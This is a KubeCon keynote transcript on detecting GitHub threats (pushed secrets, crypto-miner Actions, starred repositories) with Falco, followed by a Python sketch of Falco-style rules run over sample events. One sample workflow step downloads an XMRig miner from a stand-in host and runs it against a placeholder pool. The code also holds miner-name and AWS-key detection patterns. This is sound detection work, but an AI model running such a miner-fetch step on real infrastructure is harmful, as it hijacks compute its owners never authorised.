From YouTube: Keynote: Detecting Threats in GitHub with Falco - Loris Degioanni, CTO & Founder, Sysdig
Description
Don’t miss out! Join us at our upcoming event: KubeCon + CloudNativeCon Europe 2023 in Amsterdam, The Netherlands from April 17-21. Learn more at https://kubecon.io. The conference features presentations from developers and end users of Kubernetes, Prometheus, Envoy, and all of the other CNCF-hosted projects.
Keynote: Detecting Threats in GitHub with Falco - Loris Degioanni, Chief Technology Officer & Founder, Sysdig
Are your code repositories secure? Misconfigurations and attacks that target GitHub repositories are a serious source of risk, which many people underestimate. Learn what the most common issues with GitHub security are, and how to detect and prevent them with CNCF's Falco.
Good morning, everyone. My name is Loris Degioanni. I'm the CTO and founder of Sysdig. Sysdig is the leader in container, Kubernetes and cloud security. I'm also the original creator and one of the maintainers of Falco. Falco is the CNCF runtime security tool, and it's essentially the de facto component for runtime security in Kubernetes and for containers.
Today we're going to talk about GitHub in general. If I were to ask you the following question: in your job, what is your most valuable asset other than people? Of course, probably many of you would answer "my source code", and probably many of you, I guess the majority of you, have your source code in GitHub, or in general in some kind of git repositories. So my question at this point is: are your repositories safe?
This is the place where your most important thing is. This is also, typically, a prime target for attacks. So there are several areas, several categories of threats that your source code repositories are subject to. Examples: pushing secrets into a GitHub repository. This is something that happens routinely despite the checks that we put in place to prevent it, and countless major breaches, including recent ones (there was a Toyota one like last week), are caused by, you know, somebody just committing a secret, a password, a key or something on a repository.
Another example is running GitHub Actions with miners. This is something that is becoming more and more of an issue. GitHub is giving us more and more flexibility to complement our code repositories, and the events that can happen on these code repositories, with actions that are actually executed on a computing pool that is offered to us by GitHub.
Of course, whenever there's a computing pool where you can execute arbitrary actions and code, then there's a risk for somebody, internal or external, to abuse that and use it for things that it wasn't designed for, like, for example, running miners, which is something pretty common, and it's been abused in a publicly visible way multiple times. Another example is mistakenly publishing a private repository. You know that feeling when you discover that somebody published the wrong repository and your code, maybe with secrets inside, is publicly available online.
Yes, GitHub asks you to confirm, to type the name of the repository, when you take an action like that, and yes, this still happens. For example, it happened to me a few years ago, and I tell you, it's not a pleasant feeling. So how can we detect and protect from threats like this? One possible approach that I'm going to talk about in these few minutes is using Falco, as I was mentioning. Falco is what I often describe as the security camera for modern applications.
Falco typically listens on your containerized, Kubernetes-based endpoints. It captures a bunch of signals, for example system calls, and it has a detection engine that is able to give you alerts, so it detects bad stuff and gives you alerts. Falco traditionally has been designed to protect containers and pods and namespaces and services on Kubernetes, but recently we have released a GitHub plugin so that you can have the same type of real-time runtime security that Falco is based on, but for GitHub.
Let's see how it works. So I actually have a virtual machine here where I'm just going to run, you know, my local copy of Falco, and I run it configured essentially to connect to my test GitHub repository. I can see that immediately Falco tells me, you know, that it's connected to the repository. In fact, if I go to my repository, I can see that now Falco automatically, under the hood, has created a webhook to collect data from this repository.
Now, if I go in the repository, for example, you know, I have this miner action, which is just, you know, running XMRig, a well-known miner, and what I'm going to do is I'm just going to run this action manually in my repository. It actually started, and I can see that right away.
Falco was able to listen essentially to what was happening in that repository and tell me that an action with crypto miners was executed, and tell me the name of the repository, the name of the file and all of the information that I need. Another example is, I have, you know, a little piece of source code in this repository.
So let me uncomment, you know, I'm just committing an AWS hash in this repository, and then let me just push it to the repository, and again here you see: one or more secrets were pushed into a private repository. It's telling me the file, it's telling me the line. I can, you know, even go and, if I want, you know, browse and take a look at exactly where the line was committed in my repository. So Falco is essentially able to dynamically do this for me and, as you can see, I get a reaction immediately, in real time, in a matter of a few seconds. So that's the beauty of a runtime security tool like Falco. We are used to deploying this kind of runtime security tools to detect that somebody spawns a shell inside one of my pods in Kubernetes, but, as you can see, the process is applicable to other stuff as well, and Falco has many plugins that can interface with the different tools of your ecosystem.
To do this kind of detection, Falco is based on a very simple rule engine. So I can actually, you know, these are the rules, for example. This is the rule that Falco used to detect miners, so it's just a YAML file that I can go and edit, I can modify, I can add my own rules. For example, here in this file I customized it with just a simple rule, that, you know, the condition detects when a GitHub action of type star is being created.
So essentially, this is when somebody starred my repository. So if I go here and I star my repository, as you can see, immediately Falco is able to detect that and show me in real time that I got a star from user ldegio. So, as you can see, very easy, very simple: a rule is nothing else than a condition and the output that I want to see when that condition is met. So creating GitHub rules for your needs is going to be very easy.
In general, Falco is free, it's open source, it's CNCF! We are looking, hopefully, to graduate the tool in the next few months, so I recommend that everybody takes a look. It can really be helpful for this kind of scenario.
Just one last thing: we are having a Falco party tonight. It's at the Fireball Table, not far from here. So if you want to come meet Falco developers, learn more, or just socialize and have a nice drink with friends, please join us tonight. Also this afternoon, we'll have, I think starting at 1pm, a session with the Falco developers, where you can go in, ask questions and ask for their help, or learn the roadmap, and so on. So come see us, come meet with us, we're really here and we're really eager to meet with you.
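As an added illustration of the "condition plus output" rule model described in the talk, the following Python is not Falco's code nor the GitHub plugin's real field names: the event shape and the %field placeholders are simplified assumptions. It runs three rules modelled on the demo's secret-push, miner-action and star detections over constructed sample events.

```python
import re
# Constructed sample events in a simplified shape (assumed, not real GitHub
# webhook payloads); Falco's plugin would expose such data as github.* fields.
EVENTS = [
    {"type": "push", "repo": "example-org/demo", "public": False,
     "diff": {"file": "app/config.py", "line": 12,
              "added": ["AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'"]}},
    {"type": "workflow_run", "repo": "example-org/demo",
     "workflow": {"filename": "miner.yml",
                  "steps": ["curl -sL https://example.invalid/xmrig.tgz | tar xz",
                            "./xmrig -o pool.example.invalid:3333"]}},
    {"type": "star", "repo": "example-org/demo", "user": "octocat"},
    {"type": "push", "repo": "example-org/demo", "public": False,
     "diff": {"file": "README.md", "line": 1, "added": ["# Demo"]}},
]

AWS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")  # shape of an AWS access key ID
MINER_BINARIES = ("xmrig", "minerd", "cpuminer")  # well-known miner binaries

def has_secrets(ev):  # any added diff line that looks like an AWS access key ID
    return any(AWS_KEY_ID.search(line) for line in ev.get("diff", {}).get("added", []))

def has_miners(ev):  # any workflow step that invokes a known miner binary
    steps = ev.get("workflow", {}).get("steps", [])
    return any(b in s.lower() for s in steps for b in MINER_BINARIES)

# A rule is just (name, condition, output), as in Falco's YAML; %a.b in the
# output is resolved against the event the way a Falco field would be.
RULES = [
    ("Secret pushed into a private repository",
     lambda e: e["type"] == "push" and not e.get("public") and has_secrets(e),
     "secret in %repo file=%diff.file line=%diff.line"),
    ("Crypto miner run in a GitHub action",
     lambda e: e["type"] == "workflow_run" and has_miners(e),
     "miner in %repo workflow=%workflow.filename"),
    ("Repository starred", lambda e: e["type"] == "star",
     "%repo starred by %user"),
]

def render(template, ev):
    def lookup(m):  # walk dotted path into nested dicts; missing -> <NA>
        v = ev
        for key in m.group(1).split("."):
            v = v.get(key, "<NA>") if isinstance(v, dict) else "<NA>"
        return str(v)
    return re.sub(r"%([\w.]+)", lookup, template)

def evaluate(events, rules=RULES):  # (rule name, rendered output) per match
    return [(name, render(out, e)) for e in events for name, cond, out in rules if cond(e)]
```

Running `evaluate(EVENTS)` yields one alert for each of the first three events and none for the harmless README push.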